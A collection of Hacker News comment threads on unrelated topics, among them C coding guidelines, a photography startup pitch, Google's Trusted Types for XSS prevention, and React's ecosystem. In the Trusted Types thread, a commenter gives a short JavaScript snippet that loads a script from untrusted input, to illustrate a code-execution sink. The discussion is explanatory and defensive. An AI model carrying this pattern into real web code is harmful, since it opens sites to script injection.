integers/](https://wesmckinney.com/blog/avoid-unsigned-integers/)
Even LLVM has all this comical code dealing with negative values stored in
unsigneds.
The idea that you should use unsigned to indicate that a value can't be
negative is also pretty arbitrary. Your integer type doesn't represent the
valid range of values in almost all cases, enforcing it is an unrelated
concern.
~~~
flohofwoe
I can see where they're coming from, signed integers come with all sorts of
caveats in C and C++ from overflow being undefined behaviour (yet modulo-math
often makes sense when integers are used as array indices) to bit twiddling
surprises. "Almost always unsigned" sounds like a good rule to me to avoid
such pitfalls, especially when 'common math stuff' is usually done with floats
or special fixed-point formats.
~~~
Aardappel
Overflow being UB is not something you run into easily with typical math,
index and size uses (not as often as your run into unsigned issues, in my
experience). Yes, bit-twiddling should be unsigned, but it is very easy to
make this code isolated, and convert from signed values storing these bits, if
necessary.
But I am going to defer to authority here: [http://www.open-
std.org/jtc1/sc22/wg21/docs/papers/2019/p142...](http://www.open-
std.org/jtc1/sc22/wg21/docs/papers/2019/p1428r0.pdf)
------
vietjtnguyen
Quick typo under OMG-CODEORG-2:
#pragma once
#ifdef __cpluspus // <-- should be __cplusplus
extern "C" {
#endif
#include "api_types.h"
// ...
#ifdef __cplusplus
}
#endif
Can't say I'm a fan of OMG-CODEORG-3, however, it sounds like compilation time
is a key metric for them.. I prefer a John Lakos style "physical components"
set up which emulates a type-as-module inclusion style. At least OMG-CODEORG-3
clearly states that include order becomes important as a result.
~~~
midnightclubbed
Agree, CODEORG-3 adds a bunch of pain. There's a reason other languages don't
have headers but since C programmers have to live with them can't I just
include the single relevant header and move on with writing my code. Yes there
is a shared cost to that (compile time) but '#pragma once' is well supported
and futzing with header order is a non trivial time-sink too.
On the same lines the template 'cute tricks' are where you get your
performance, stability and readability from C++. I definitely agree that you
should drop into assembly to see what the compiler is doing with your code but
that can and should apply to heavily templated code too.
~~~
bobdobbs666
Pragma once only prevents double inclusion within the translation unit.
On large projects bad header hygiene can cause significant compilation
overhead.
------
bradknowles
NB: For those who are not aware, ourmachinery.com is a game engine development
company.
------
mwcremer
_I.e., use a double parameter that specifies seconds, instead of an uint32_t
that specifies milliseconds._
This can have surprising and sometimes unpleasant consequences; see
[https://0.30000000000000004.com](https://0.30000000000000004.com)
~~~
United857
Better yet, use std::chrono. Yes, it's C++. But this is an example of how
properly applied bits from C++ can make things easier to reason about and
type-safe, rather than "let's avoid C++ as much as possible".
No ambiguity for the programmer as to what the underlying units are, and no
unnecessary int/float conversions. All the book-keeping and conversions are
taken care of by the compiler with zero run-time size or perf overhead.
~~~
flohofwoe
std::chrono is a terribly overengineered API even for the STL, and many game
companies have banned parts or all of the STL for good reasons (usually not
std::chrono related though).
Using an uint64_t (instead of uint32_t or double) to carry "opaque ticks", and
a handful conversion function to convert to real-world time units is fine and
just a few lines of code.
~~~
niklasgray
This is exactly what we do.
------
mistrial9
the layout and typesetting on this looks good in Firefox 70!
view-
source:[https://ourmachinery.com/files/guidebook.md.html](https://ourmachinery.com/files/guidebook.md.html)
<meta charset="utf-8" emacsmode="- _\- markdown -_ -">
~~~
corysama
Formatted by [http://casual-effects.com/markdeep/](http://casual-
effects.com/markdeep/)
------
Animats
Objects as structs with function pointers? 1990 is calling. I'm not a huge C++
fan, but trying to emulate C++ concepts in C is kind of lame at this late
date.
~~~
rootlocus
Just goes to show C++ failed the zero overhead principle.
~~~
Animats
If you don't have virtual functions, a C++ object is just an struct associated
with static function links.
------
rootlocus
OMG-DESIGN-4: Explicit is better than implicit
Ahh, straight out of the zen of Python!
$ python -c "import this"
~~~
michaelcampbell
Django: "hold my beer"
| {
"pile_set_name": "HackerNews"
} |
The French World Cup Win and the Glories of Immigration - okket
https://www.newyorker.com/news/daily-comment/the-french-world-cup-win-and-the-glories-of-immigration
======
masonic
Fake news. Most of the African-born players mentioned were _already French
citizens_ , many from birth. Hardly any were "immigrants". That would be like
calling a Puerto Rican or someone born in American Samoa working in mainland
USA an "immigrant".
~~~
Karishma1234
Well, the point is lost on you. Those players played for France because their
parents immigrated.
| {
"pile_set_name": "HackerNews"
} |
PandoDaily Acquires NSFWCORP - liordegani
http://pandodaily.com/2013/11/25/pandodaily-acquires-nsfwcorp-to-double-down-on-investigative-reporting/
======
protomyth
From the Guardian article:
Carr said he expects Pando to start making more waves,
but for different reasons. Pando’s investigative team
would target all the most powerful people in the Valley
and challenge them “when they need challenging,” he
said. Some of Pando’s investors “were going to shit
himself” when they heard NSFW’s team was joining
Pando, he added.
Somehow, I really doubt this part. I think non-investors have a much higher
probability of getting "challenged" than investors.
------
jaredmck
They're such investigative journalists that they won't even provide any
details of their own transaction. Oh, wait.
------
rb2e
Don't wish to be a grump but the original announcement post is from Pando
Daily/ Sarah Lacy @ [http://pandodaily.com/2013/11/25/pandodaily-acquires-
nsfwcor...](http://pandodaily.com/2013/11/25/pandodaily-acquires-nsfwcorp-to-
double-down-on-investigative-reporting/) and this post doesn't really say much
</end grumpiness>
~~~
untog
Anything that gives Pando Daily less traffic is all good by me.
------
Brajeshwar
D __n! There goes the chance to sell my site to NSFWCORP.
------
thrillgore
I expect a very public resignation within three months.
| {
"pile_set_name": "HackerNews"
} |
How to charge money for things that don't exist yet - SteliE
https://www.linkedin.com/today/post/article/20140423214327-7006635-how-to-charge-money-for-things-that-don-t-exist-yet
======
calcsam
Surprised this didn't get more upvotes. It's great.
| {
"pile_set_name": "HackerNews"
} |
Apply HN: Lenzy – affordable photographers guaranteed to suit you, booked in 50s - louisswiss
With Lenzy you can choose the perfect photographer for your needs, get a guaranteed price and book/pay within 50 seconds. Bookings will either take place via our web-app or, more commonly, our JS plugin embedded in third party websites and apps where users might need the services of a photographer (e.g. a job platform, shopify, airbnb, ebay etc). Instead of choosing a photographer based on their profile, our photo recommendation engine lets you choose the right photographer for your needs based on samples from their portfolios in a tinder-style interface.<p>As avid photographers ourselves, we know that this is the optimal way of finding the right photographer for your project, due to it being a much more subjective, individual perspective than other on demand services such as cleaning, transport etc, where safety and peer-approval are paramount (the photographer who my friend thought did a great job at her wedding, for example, is probably not the right person for my e-commerce product photos). Interestingly, thanks to the general increase of interest in photography and the improvement in photography hard- & software, 90% of the 'best' photographers out there are actually amateurs, art-students and other hobby-photographers who 'occasionally do shoots for friends'. By harnessing this eager supply, matching efficiently and increasing the demand by making awesome photos available to everybody at a price they can afford, we can offer a better quality experience than 'professional photographers' at less than half of the price.<p>We are a team of 3, who have worked together successfully on projects before...<p>- 1 designer & professional photographer
- 1 (mainly front-end) dev/amateur photographer/sales guy
- 1 back-end dev (not great at taking photos, but has seen thousands in his lifetime)<p>We have a working beta and partnerships with third party sites which are profitable.<p>We would love to field your questions/feedback :)
======
fitzwatermellow
Lots of nascent demand for pro photo services. Culture is becoming visual on
an unprecedented scale. Two quick queries:
1\. How quickly do you think you could scale this globally? Customer requests
a shoot on a volcano in Greenland for example ;)
2\. Why not provide a full service solution? That is not just the
photographer, but for a fashion brand shoot for example, all the models, hair,
makeup, location, catering, legal clearances and the other 100 things I am not
anticipating ;)
~~~
louisswiss
Thanks, we agree! Even more importantly, the definition of 'pro photo
services' is changing rapidly from _high prices, fixed retail location_ to
_high quality, style & subjective fit_.
1\. This would be awesome and hopefully we can manage it someday, however a
lot of stock photo websites actually cover this pretty well already (assuming
you just want custom photos of the volcano). In our experience, if you can
afford to actually have your event/wedding/CV-headshots (now that would be an
awesome LinkedIn profile photo) taken on location in Greenland, you tend to
find shipping out your 'usual' photographer with you and putting them up in a
hotel as a negligible cost ;)
2\. This could be something we expand to later, but we want to focus on what
we know and do best now and make it a really great service. Also, our JS
plugin means we partner with companies already offering some of these services
to generate free new bookings, so we don't want to alienate anybody :)
~~~
louisswiss
Forgot to add that in a lot of cases (especially fashion shoots), there is
more equipment needed (lighting, reflectors etc) and normally a second person
is needed to 'handle' this equipment during the shoot.
We are working with our photographers to give every one of them access to this
service/equipment and normally one of the models will help out as the second
person, keeping costs low.
------
kumarski
In this business, the proof is in the results.
I imagine many YC folks have seen these types of companies before.
I can name 2 in my head, but they don't do the tinder style interface.
eversnapapp.com PrettyInstant.com
Godspeed. I think you're on to something.
~~~
louisswiss
Thanks for the inputs - I agree, there must be 100s of similar applications
each year relating to on demand photography.
We love the concept of eversnap, however it is a bit of a risk leaving your
wedding day/event in the hands of (possibly inebriated) guests :)
I think our target market is less events/weddings and more the other areas of
personal and professional life where great photos can make a BIG difference,
but price and time constraints (for finding the right photographer)discourage
people from using traditional services (like PrettyInstant). Examples would be
when renting out your home, selling something online, photos for the marketing
department (headshots, teamphotos, e-commerce product photos, CV-style photos
etc.
We love the tinder interface and it seems to work well, but at the end of the
day it won't put us head and shoulders above the competition. What really sets
us apart is that with us, you book a photographer by judging how they shot a
photo which had similar requirements to your shooting. It seems crazy to us as
photographers that PrettyInstant (for example) guarantees to only work with
'the best' photographers, yet depending on what style you are looking for, the
lighting and the general setting (is it a headshot or documenting a party?),
any one photographer could be the perfect fit for you or they could be
terrible.
~~~
scotu
disclosure: I work on eversnap
eversnapapp.com was never meant to replace pro photography wedding photos, but
to add some authenticity to the mix (and capturing any friends and family get
together), plus we offer live slideshow moderation ;)
We also complete the offer with our own professional photography service on
eversnappro.com
That said, best of luck to you and your team!
~~~
louisswiss
nice - I hadn't looked at eversnappro.com before.
I wasn't trying to insinuate that eversnapapp.com was trying to replace pro
photos - I love the idea, the execution and would definitely use it myself ;)
------
pjlegato
What is your marketing plan to reach both the customers and the photographers
who will use the app?
~~~
louisswiss
Ah, the classic chicken & egg problem ;)
Finding awesome photographers has been much easier than we expected - by
posting 'photographer needed' adverts on forums/in camera shops/in facebook
groups it is easy to get a few hundred responses within a week. Over 50% then
sign up because there is no fee or obligation and hey, why wouldn't you?
We don't have the website live in an open beta yet, so we don't know how much
the b2c marketing will cost - we are actually focussed heavily on working with
partner websites to get them to embed our JS booking widget into their
websites. We are trialling with a job-platform and it is a great way for us to
reach customers at exactly the 'right moment' (ie when they have the need for
a photographer but perhaps hadn't fully considered it). The partner website
then gets a commission from each booking, so it is a great additional revenue
incentive for them as well.
So far, our customers have been really happy and word of mouth seems to work
really well for getting new bookings - this was really important for us as we
weren't sure that the customers would refer their friends to us at Lenzy and
not just to the photographer they worked with directly. By giving our
photographers a small commission on bookings we receive from their customers'
referrals, we seem to have avoided the HomeJoy problem (for now).
| {
"pile_set_name": "HackerNews"
} |
Trusted Types Help Prevent Cross-Site Scripting - spankalee
https://developers.google.com/web/updates/2019/02/trusted-types
======
comex
I’m a little skeptical. The example in the post, where you validate a URL
against a regex before string-interpolating it into an HTML fragment, is
essentially an anti-pattern. It’s too easy to screw up the regex and end up
with an injection vector, especially in cases (probably the majority of them)
where the thing being validated is less inherently constrained than
“alphanumeric”. Instead, it’s best to use APIs that are safe by construction -
in this case, using DOM APIs to create elements, without ever going through
the intermediate string representation of HTML. See also, “Never sanitize your
inputs!”:
[http://blog.hackensplat.com/2013/09/never-sanitize-your-
inpu...](http://blog.hackensplat.com/2013/09/never-sanitize-your-
inputs.html?m=1)
But if you use DOM APIs for everything, this “Trusted Types” API seems largely
unnecessary. It would be enough to expose a switch to disable innerHTML and
similar APIs entirely.
On the other hand, DOM APIs are rather unergonomic to use raw. Many wrappers
exist, but React‘s JSX takes the cake by letting you write code that _looks_
like string interpolation, yet compiles down to type-safe node creation. (Kind
of like what parameterized queries do for SQL.) If we’re looking at browser-
based approaches to solving XSS… how about standardizing something like JSX as
a built-in browser feature? That way it could be used by everyone, even those
who want to minimize dependencies or code directly for the browser.
(Yes, I know it’s been tried before, in the form of E4X. But that was a very
different era…)
~~~
rictic
Trusted Types are definitely designed with safe-by-construction APIs in mind.
A primary use case is to write a safe-by-construction library that internally
declares and uses a Trusted Types Policy that your CSP headers declare that
they trust.
If none of the policies in your CSP headers declare a createHTML method, then
you can be confident that innerHTML can't be used anywhere in your app.
You still want the other policy methods because there are other unsafe sinks
in the DOM. For example:
const scriptElem = document.createElement('script');
scriptElem.src = someUntrustedInput;
document.body.appendChild(scriptElem); // arbitrary code execution!
There's a number of these sinks, and they have legit important use cases, but
you want to be able to sustainably review all such uses. For example, you
could make a Trusted Types policy that will only accept a small number of
constants for script urls. That way you can still create script elements to
e.g. implement lazy loading of code, but you're certain that those APIs will
not be used by an attacker to load unknown code.
------
jrockway
I am surprised more programming language research hasn't focused on problems
like this. Perl had taint mode back in the day (presumably it still exists),
but it didn't quite do enough to really be helpful. I am glad to see this idea
resurfacing because I think it can solve a lot of problems, not just security-
related.
A long time ago, I remember people having an insane amount of trouble with
character handling; when you read binary data from a TCP socket or UNIX file,
you're reading bytes, not characters. But many people would treat the bytes
like characters, causing all sorts of trouble. My favorite was the double-
encoding, where you read UTF-8 encoded characters as bytes, treat the bytes as
Latin-1, then encode the Latin-1 characters as UTF-8. This was a perl quirk
because Latin-1 was the default, but the same bug happens in other languages.
Anyway, a good tainting system could prevent this sort of bug. The language
can say "hey, this is a TCP socket, you can't treat those bytes as
characters!" But it doesn't. And the bug occurs again and again.
(The corner cases that people don't think about are the real problems. What
charset are those bytes in your URL? What about filenames? The answer is: it's
often undefined. So rather than hope for the best, a compiler error would be
ideal.)
The state of the art, as far as I can tell, is to just treat everything as
UTF-8 these days. Since everyone seems to love UTF-8, it just works. Maybe
that was the real solution. But I know there are a lot of Japanese-speakers
with names that can't be encoded as UTF-8. I wonder what they're doing about
that.
~~~
Sohcahtoa82
I feel like Python 3 has largely resolved the bytes vs characters problem.
Byte arrays and strings are different classes in Py3. File and socket I/O
deals only in byte arrays which are treated more like lists than strings. To
perform a lot of string-like operations, you have to explicitly decode the
byte array into a string. If you get it wrong, you'll likely get either a
TypeError.
~~~
jrockway
This is good, but I'd prefer the error to occur at compile time. Consider the
case where you do something like creating an error message because you can't
open a file, and want to include the filename. The filename is bytes, the
error message is a string, so instead of being able to print the error
message, you instead throw an undebuggable exception.
Dunno if that in particular is a problem in Python or not... but it is the
sort of thing to watch out for.
~~~
Sohcahtoa82
In Python, filenames can be either bytes or string.
Also, I made a mistake in my previous post. File I/O can deal with bytes OR
strings depending on the parameters sent to the `open()` function.
file_handle = open('somefile.txt')
This opens the file in text mode (so `file_handle.read()` returns strings)
using a platform-dependent encoding. On Windows, this will probably be
CP-1252. On Linux, UTF-8. Of course, you can always explicitly choose the
encoding:
file_handle = open('somefile.txt', encoding='utf8')
If you know you want to only deal with bytes, you can explicitly set that:
file_handle = open('somefile.ext', mode='rb')
I agree that it'd be nice to be able to see bytes vs strings errors at compile
time, but this is difficult or even impossible with a duck-typed interpreted
language like Python. IDEs and linters can make a good attempt at it, but
they're not perfect.
------
rubbingalcohol
How about just don't use innerHTML? It's slow, insecure and lazy. We don't
need Google pushing more proprietary fake web standards in their IE6 browser.
They should fix the existing issues in CSP (like WebAssembly being completely
broken) before adding new crap to it.
~~~
arkadiyt
There's a lot more XSS sinks than innerHTML, and "just don't do it" isn't
helpful security engineering. Mike Samuel published a great post with lots of
context on the design of Trusted Types at Google and why they think it works
well:
[https://github.com/w3c/webappsec-trusted-
types/wiki/design-h...](https://github.com/w3c/webappsec-trusted-
types/wiki/design-history)
~~~
rubbingalcohol
It's a lot of handwaving. So Google improperly saved HTML into database string
fields and now needs to figure out how to safely render it in a template. We
don't need a new web "standard" to help them wallpaper over their first-party
bugs.
For the longest time Firefox add-on developers were prohibited from submitting
extensions with eval or innerHTML precisely because it is ~not safe~! Adding a
bunch of browser-enforced regex checks to your strings is the wrong solution
here. The solution is to not write code that writes itself.
~~~
jamesgeck0
> So Google improperly saved HTML into database string fields and now needs to
> figure out how to safely render it in a template.
FWIW, "store anything, sanitize at render time" is the preferred approach for
some popular web frameworks, including Rails.
~~~
rubbingalcohol
And that's fine. To the extent that stored data represents a security risk,
sanitization can and should be done on the server side.
------
zer0faith
Am I reading this correctly.. creating a regexp introduced into a template,
then applying that template to a value in the web request?
~~~
stevekemp
Pretty much. Interestingly it is a very similar approach to Perl's "taint
mode". The intention is obviously that you can't blindly use/output values
that are user-provided. Instead you must validate, and convert them to a
"trusted type", at which point you can use them in your DOM tree, or wherever
you wish.
The big difference is that if you forget a place here you'll get a type error
- rather than the current situation where if you forget to validate/sanitize
you get an XSS attack.
| {
"pile_set_name": "HackerNews"
} |
Living Code. Show off your code in a fancy way. - rodnylobos
Need to build a reduced demonstration of your latest creation?<p>Living Code is great for that, it's a clean and fancy way to show off your code in an old fashioned ASCII terminal emulator.
Living Code it's part of JS1k demo, that means it has less than 1024 bytes.<p>http://js1k.com/2013-spring/demo/1387#.UVLAsFETayc.twitter<p>Submission [1387] JS1k.
======
jameswyse
Clickable: <http://js1k.com/2013-spring/demo/1387#.UVLAsFETayc.twitter>
Love the blur effect following the cursor, well done :)
------
jdolitsky
very cool
| {
"pile_set_name": "HackerNews"
} |
Judge throws out teen’s murder conviction 70 years after his execution - yuashizuki
http://www.washingtonpost.com/news/post-nation/wp/2014/12/17/judge-throws-out-teens-murder-conviction-70-years-after-his-execution/
======
PhantomGremlin
Fortunately we've made some progress in terms of rights of the accused in the
last 70 years. It's stories like these that provide strong arguments against
the death penalty.
But the pendulum does swing the other way, to weekend furloughs for murderers
sentenced to life imprisonment without parole.[1] That particular individual
played a big role in the 1988 US Presidential election.
[1]
[https://en.wikipedia.org/wiki/Willie_Horton](https://en.wikipedia.org/wiki/Willie_Horton)
------
shalbert
Wow.
| {
"pile_set_name": "HackerNews"
} |
Multimedia C++ library SFML 2.0 has been released - eXpl0it3r
http://www.sfml-dev.org/
======
axusgrad
It's an easy library to get into. I was able to play around with basic OpenGL,
and the program was cross-platform without needing any #ifdef statements.
What's amazing to me is how Laurent basically writes it and runs the website
by himself (as far as I can tell).
| {
"pile_set_name": "HackerNews"
} |
In this video you will see 70 lighters vs. fire - macheens
https://www.youtube.com/watch?v=pwn0954J3kM
======
m6w6
What a waste of time and resources.
| {
"pile_set_name": "HackerNews"
} |
How Rotten Tomatoes Changed the Film Industry - DmenshunlAnlsis
https://daily.jstor.org/how-rotten-tomatoes-changed-the-film-industry/
======
lucb1e
That's a very... nothing-saying article. It mentions that some professional
(money-making) movie reviewers gathered a decade ago for an interview, and
admitted that it might be nice to get an opinion of a large audience through
the internet, rather than only a few reviewers'. And from that it half-
concludes that there is some tension between the two (online, 'democratic'
platforms and the professional reviewers), and cites someone who hopes they
can coexist or something. Umm, okay?
So how did the actual film industry change? All I read is about reviewers
potentially having gone out of business because reviews can be found in bulk
online.
| {
"pile_set_name": "HackerNews"
} |
Day One with the Oculus Rift DK2 - bane
http://www.roadtovr.com/day-one-oculus-rift-dk2-good-ugly-games/
======
jimrandomh
Does anyone have data on how big fonts have to be, to be legible on a DK2? Ie,
if you embed a terminal in a virtual world, and give it about 30 degrees of
horizontal space, how many characters will that fit?
~~~
cma
It's a 90 degree FOV, Each eye gets half of 1920, then divided by 3 (30°/90°),
you'll get 1920/(3*2) = at least 320 horizontal pixels to work with. There are
more pixels in the center due to how the distortion works, so in practice a
little more than 320.
(edit: actually, if I recall, the 90° FOV on DK2 is actually a diagonal FOV,
so you are looking at a ~78° horizontal FOV)
------
thenmar
Sounds pretty encouraging. I hope Facebook's financial backing can turn this
into a mass market product in a few years. Also interesting that the
development kits cost only $350. I wonder if that could drop lower with a
bigger production, or if the economy of scale benefits have already been
reaped via 3rd party hardware producers.
~~~
objclxt
Well, it's entirely possible - probable, even - that Oculus are selling the
DK2 at a loss right now (which isn't unheard of at all for development
hardware.
~~~
ghostfish
I doubt they're taking a loss, and I'd be surprised if they're not making a
decent profit. What are the components? A 1080p cell phone screen, some
cabling, custom plastic enclosure and straps, an IR webcam, and the
PCB+components. That's not much, cost wise.
~~~
sonnym
I think this very much oversimplifies the costs. From a hardware standpoint
this is probably mostly correct, but the problem is the sheer amount of
research and talent behind it is not remotely inexpensive. I recall Carmack
saying, about a year after he joined Oculus, that he thought getting the
latency down would be straightforward (sorry - I can't find a source), but it
turned out to be a much harder problem than he expected. And, when Carmack is
stuck, I cannot but believe there are intricacies that I could not hope to
understand at play. The fact that they have been unable to ship a consumer
version after all this time, I think, corroborates that this is a much more
difficult problem than just throwing some hardware together and calling it a
day.
------
Alphasite_
If nothing else, the new elite also supports the dk2, although we may not see
the full experience until Monday.
------
acron0
This article has made me $350 lighter.
------
_random_
Does 'DK2' mean "ready to be released before Xmas" in their language?
~~~
erikpukinskis
I think they said if there is DK3 it will basically be production hardware
released to a limited number of developers shortly before consumer release.
They have been careful not to say anything about release dates for the
consumer device but my understanding is that 2014 is possible but unlikely.
------
notastartup
there was also this game I forgot the name but the space ships were so
detailed it was amazing when it was demoed on oculus rift.
this new version seems a huge step up from previous version, namely the
resolution increase.
I so badly want this now as the low resolution is what has turned me off DK1.
On a side note, I wonder how difficult it will be to see a glove that you can
wear and get tacticle feedback?
~~~
scrollaway
I think it might have been EVE Valkyrie. Although Star Citizen has got to look
pretty amazing in the DK2 - Has anyone tried it? I only have the DK1 to play
with, unfortunately.
| {
"pile_set_name": "HackerNews"
} |
The React Is “just” JavaScript Myth - formikaio
https://daverupert.com/2018/06/the-react-is-just-javascript-myth/
======
ipsum2
> React is so much more than “just JavaScript”. React is an ecosystem. I feel
> like it’s a disservice to anyone trying to learn to diminish all that React
> entails. React shows up on the scene with Babel, Webpack, and JSX (which
> each have their own learning curve) then quickly branches out into
> technologies like Redux, React-Router, Immutable.js, Axios, Jest, Next.js,
> Create-React-App, GraphQL, and whatever weird plugin you need for your app.
> In my experience, there’s no casual mode within React. You need to be all-
> in, keeping up with the ecosystem, or else your knowledge evaporates.
This is not true at all. I use React for work and for pet projects, and I
don't use or know what most of these libraries do. (We do use Redux).
It's easy to get caught up in library mania and chase after the newest
javascript fads, but it is not necessary to build products.
Also, GraphQL is not tied to React or Javascript.
~~~
sus_007
Just out of curiosity, what are your thoughts on Vue? I've heard a lot of good
things about it.
~~~
ipsum2
I dislike the templating language, preferring jsx which is mostly standard js
syntax, e.g.:
Vue: <li v-for="i in items">{{i}}</li>
React: items.map((i) => <li>{i}</li>)
~~~
bartaxyz
Just to make things clear. You can use JSX with Vue as well. It's even a
recognized way to write code in the official documentation
([https://vuejs.org/v2/guide/render-
function.html#JSX](https://vuejs.org/v2/guide/render-function.html#JSX)). JSX
is just a language that can be interpreted into code for React & Vue.
~~~
Can_Not
Not to mention that you can use Jade/pug, also.
------
Androider
It's absolutely fine to adopt React piece by piece, I disagree entirely that
it's an all-or-nothing proposition. I've converted a heavily used in-
production service from 0% to 100% React over the course of more than a year.
And this is an SPA, so over that year there was literally jQuery and React
rendering to the same DOM. It works just fine, it's all just JS.
You don't have to use Redux etc. (but you probably do if you have sufficiently
complex state). Even then, you can do things like have multiple stores in the
same app. It's fine! It's just JS objects being spliced, merged, propagated.
You eventually converge on a single store as the various React parts merge.
You don't need to use react-router, or even a router lib. It's probably better
if you don't, given how many times that shitshow of an API has been completely
rewritten. I took one look at it, could tell that this lib wanted to be fully
in charge, and noped out. It's fine to manage browser URL state yourself, it's
just JS and the browser APIs are OK for that nowadays.
Now we're in the process of adopting Immutable.js. It's fine, it's just
fancier collections, with some conveniences and being able to use
React.PureComponent 99% of the time without worry. So your codebase is 50%
fancy collections and 50% JS natives? That's fine, don't worry about it, just
write new components using Immutable.js if that's the direction you're going.
Don't worry about the top-level Redux container not being an Immutable
instance, just use it for the leaves then.
Server side rendering? I retrofitted that in a weekend by compiling the app as
a lib with Webpack (project started as Gulp way back), included that in
Node.js as an import. Worked just fine, nothing to it. Now we're generating
PDFs using the same frontend code with Puppeteer and SSR, it's awesome.
The app is in a better shape than ever, a real pleasure to work with. Jest
tests for React stuff, Mocha tests for other parts. And that's fine, no need
to get all religious about which one is the "one true" framework.
------
hazza1
The jQuery api was hundreds of different methods, the best of which are now
available natively in JavaScript.
React has a very small api, I hardly ever refer to the documentation (unlike
when I was a jQuery or Angular developer)
I agree that people reach too early for helper libraries but you can go a long
way in pure React.
~~~
mrtksn
Because React doesn't manipulate the DOM directly you're leaving every
convention and tool about DOM manipulation behind, which means that the moment
you want to do something more complex than composing components you either
have to re-invent the wheel or use the brand new wheels that somebody re-
invented.
React is brilliant but makes simple stuff that no one was thinking on anymore
hard and complex again. So if you don't want to think about how to handle an
AJAX request and an animation like it's 2004 you can just slap a library on
top of React(and worry about the page size and loading strategies).
React is a statement, a revolution, it is about disowning the old Web and
building it from scratch.
~~~
hazza1
fetch and CSS handle AJAX and animation absolutely fine with native calls and
work well with React, why would you bring in a library to handle these?
~~~
mrtksn
You bring animation libraries in when your UI animations don't necessarily
match the component lifecycles and you don't want to do something basic. Well,
you don't have to bring in animation libraries but then you'll have to
engineer it by yourself and handle all the quirks.
In React you simulate a DOM(or whatever) instead of working on a DOM that's
handled by the browser(or whatever).
It's just like the difference of a real-world physics and simulated physics.
In the real world, you can throw a rock and the nature will handle everything.
On a simulation, you will have to think about all kind of details to make your
simulation as realistic as possible.
~~~
hazza1
I don't really see how complex animations is something React (or any UI
framework) should be responsible for ?
~~~
mrtksn
Who should be responsible if not the UI framework?
Oh, and by complex, I don't mean character animation or something. It's the
stuff that is supposed to act differently than the React's internal workings.
For example, if you want to do an animation on items that disappear when the
user takes an action it's not going to be easy as with plane JS manipulating
the DOM. Also, you won't be able to use some nice artistic animations that
were created by direct DOM manipulation.
------
ralmidani
Having an ecosystem does not, in my humble opinion, make writing a React
application feel substantively different from writing a pure JS application.
Yes, JSX is not part of the core language (yet), but it's the closest to pure
JS we are going to get considering developers' need for an intuitive,
expressive, and virtually bulletproof templating language.
Before learning React, I built some decent-sized applications with Ember and
Emblem (a whitespace-significant language that compiles to Handlebars) and it
was utterly painful. Not wanting to deal with Handlebars' proprietary, Ruby-
like syntax (not bad per se--Ruby is really cool--but out-of-place in a JS
application) and its artificial limitations on what you can do with the
language (anything resembling display logic has to be extracted into special
helper functions) is probably the single biggest reason I ultimately came to
prefer React over Ember, despite Ember having some conveniences React didn't
and still doesn't (such as a concrete modeling and persistence layer like
Ember Data).
With that aside, I think React is the closest we can get to "just JS" without
abandoning pragmatism.
Transpilers and build systems are a necessity when the language itself is
changing at such a rapid pace and there are so many different environmental
concerns an application needs to satisfy.
~~~
acdha
Out of curiosity, what do you think about lit-html[1]? The main thing I’m
interested in there is that it’s based on native web technologies so you don’t
need the huge non-standard React stack just to be able to load a file. Having
has similar experiences with frameworks in the past I’m increasingly inclined
only to use things which are moving in the direction of web standards to
reduce the amount of churn.
1\. [https://github.com/Polymer/lit-
html/blob/master/README.md](https://github.com/Polymer/lit-
html/blob/master/README.md)
~~~
ralmidani
Looks nice! I've thought about working with tagged template literals before,
but I didn't know Google already had such a project.
On the flip side, I am apprehensive about it being run by Google. Look at what
happened with Angular 1.x, which was also supposed to let you do data-binding
without abandoning valid html completely.
Also, JSX offers some conveniences I'm not sure would be possible with tagged
templates, such as not having to join an array explicitly after you map its
data to markup. Edit: I stand corrected; lit-html supports mapping an array to
markup naturally.
As far as churn, which in general is a valid concern, I don't think React is
going anywhere in the foreseeable future; it, along with Vue, has gained
developer mindshare even jQuery may not have enjoyed back in its glory day.
Absent a totally unexpected breakthrough, or Facebook really dropping the ball
on updates, I think React could easily be viable in 2025 or beyond.
Edit: lit-html is built with TypeScript, oh my! I will definitely be diving
deeper into this project. Especially if I'm not building an SPA.
------
ThePhysicist
Personally I strongly disagree that you need to be "all in" on the React
ecosystem if you don't want your knowledge to evaporate (as the author puts
it):
I've been using React since 2015 when it was still in beta, so I witnessed the
evolution and invention of the whole ecosystem around it firsthand.
And while it's true that the team and community introduced many new tools and
technologies, you could probably still use the original React documentation
from 2015 to build a simple app (as to my knowledge no backwards-incompatible
syntax changes were introduced).
Also, for 99 % of apps you probably don't need the full-blown React stack like
React Router, Redux, server-side rendering, hot reloading, transpiling with
Babel, bundling with Webpack2 etc. I routinely build small React apps for
websites (e.g. for contact forms) using just vanilla React.js (actually
Preact.js as it has a smaller footrprint) without any of the amenities listed
above, and sometimes I even write old-style ES5 code and use JS-based tags
instead of JSX.
So please only introduce additional complexity (in form of tools, libraries
and add-ons) if you really really need it. The more complex your toolchain,
the more effort you will spend just maintaining and upgrading it instead of
doing productive work (frontend devs who tried upgrading Webpack and Babel.js
to the latest version in an existing project with many dependencies probably
know what I'm taking about).
------
ljm
React has certainly inspired a huge shift in how we architect frontend web
apps, and I think I'd rather view it on those terms instead of just how much
you might buy into React's worldview and all of the libraries that subscribe
to it when building your app.
React is one particularly well-regarded implementation of a virtual DOM
library with one way databinding and ever since then we've seen various
flavours of it with innovations of their own: Elm and the architecture that
inspired Redux, ReasonML, reflex-frp, CLJS/Om Vue, Cycle.js, Glimmer, etc...
React, as far as I know it, was the first for the web and while it might have
been well-known in other situations, we were all scrambling around trying to
solve the data-binding problem when building anything large scale in JS.
In that way, React's impact on the frontend ecosystem is profound much in the
way jQuery's impact was back in the darker days, and what that technology has
allowed us to do _without depending on React itself_ is significant, much more
so than its own ecosystem.
------
goofballlogic
Strange article. The add-on libraries described aren't necessary at all.
------
petilon
The benefits of React (such as its templating syntax) can be had with much
simpler libraries, such as this one:
[https://github.com/wisercoder/uibuilder](https://github.com/wisercoder/uibuilder)
The much touted benefit of React, DOM diffing, is useful if you have a very
complex screen and you need to make surgical updates. Most applications have
simple screens that can be completely re-rendered and the user won't know the
difference.
------
davnicwil
> I sometimes browse React projects and look at the import blocks to see if I
> recognize any of the dependencies; I probably average about ~8%.
This is very true, not just because of the libraries you don't know yet but
also because those you do know are continuously evolving. I've been working in
the React ecosystem for about 4 years now. I think constantly keeping an eye
on the changing ecosystem, and constantly changing the way you do things where
it makes sense, just comes with the territory now. You just have to accept it
as a way of working, if you're going to enjoy working with React (and JS
generally).
Whenever I've locked down dependencies and just got my head down and built
stuff for a few months, without fail every time I've looked up I've realised
that there are now multiple things in my stack that are 'outdated' and there
